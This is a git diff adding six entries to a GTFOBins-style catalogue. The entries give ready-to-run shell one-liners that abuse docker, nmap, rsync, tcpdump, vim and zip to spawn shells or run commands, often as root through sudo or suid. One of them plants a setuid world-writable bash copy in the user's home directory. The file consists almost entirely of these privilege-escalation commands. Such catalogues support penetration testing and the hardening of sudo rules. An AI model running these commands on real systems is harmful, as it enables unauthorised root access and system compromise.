diff --git a/_gtfobins/docker.md b/_gtfobins/docker.md new file mode 100644 index 0000000..1bc89b1 --- /dev/null +++ b/_gtfobins/docker.md @@ -0,0 +1,7 @@ +--- +functions: + execute-interactive: + - code: docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p + sudo-enabled: + - code: sudo docker run -v /home/${USER}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p +--- diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md new file mode 100644 index 0000000..d3632f5 --- /dev/null +++ b/_gtfobins/nmap.md @@ -0,0 +1,9 @@ +--- +functions: + execute-non-interactive: + - code: echo "os.execute('/bin/sh')" > /tmp/script.nse + nmap --script=/tmp/script.nse + sudo-enabled: + - code: echo "os.execute('/bin/sh')" > /tmp/script.nse + sudo nmap --script=/tmp/script.nse +--- diff --git a/_gtfobins/rsync.md b/_gtfobins/rsync.md new file mode 100644 index 0000000..79ff9e4 --- /dev/null +++ b/_gtfobins/rsync.md @@ -0,0 +1,9 @@ +--- +functions: + execute-non-interactive: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null + sudo-enabled: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + sudo rsync -e 'sh /tmp/tmpfile' /dev/null 127.0.0.1:/dev/null 2>/dev/null +--- diff --git a/_gtfobins/tcpdump.md b/_gtfobins/tcpdump.md new file mode 100644 index 0000000..5c2165e --- /dev/null +++ b/_gtfobins/tcpdump.md @@ -0,0 +1,9 @@ +--- +functions: + execute-non-interactive: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root + sudo-enabled: + - code: echo "whoami > /tmp/whoami" > /tmp/tmpfile + sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root +--- diff --git a/_gtfobins/vim.md b/_gtfobins/vim.md new file mode 100644 index 0000000..fb45d0b --- /dev/null +++ b/_gtfobins/vim.md @@ -0,0 +1,19 @@ +--- +functions: + execute-interactive: + - code: vim -c ':!/bin/sh' + - code: | + vim + :set shell=/bin/sh + :shell + file-write: + - code: | + vim file_to_write + w + file-read: + - code: vim file_to_read + suid-enabled: + - code: ./vim -c ':!/bin/sh -p' + sudo-enabled: + - code: sudo vim -c ':!/bin/sh' +--- diff --git a/_gtfobins/zip.md b/_gtfobins/zip.md new file mode 100644 index 0000000..9d3864f --- /dev/null +++ b/_gtfobins/zip.md @@ -0,0 +1,11 @@ +--- +functions: + execute-interactive: + - code: echo "/bin/sh" > /tmp/run.sh + chmod +x /tmp/run.sh + zip z.zip * -T -TT /tmp/run.sh + sudo-enabled: + - code: echo "/bin/sh" > /tmp/run.sh + chmod +x /tmp/run.sh + sudo zip z.zip * -T -TT /tmp/run.sh +---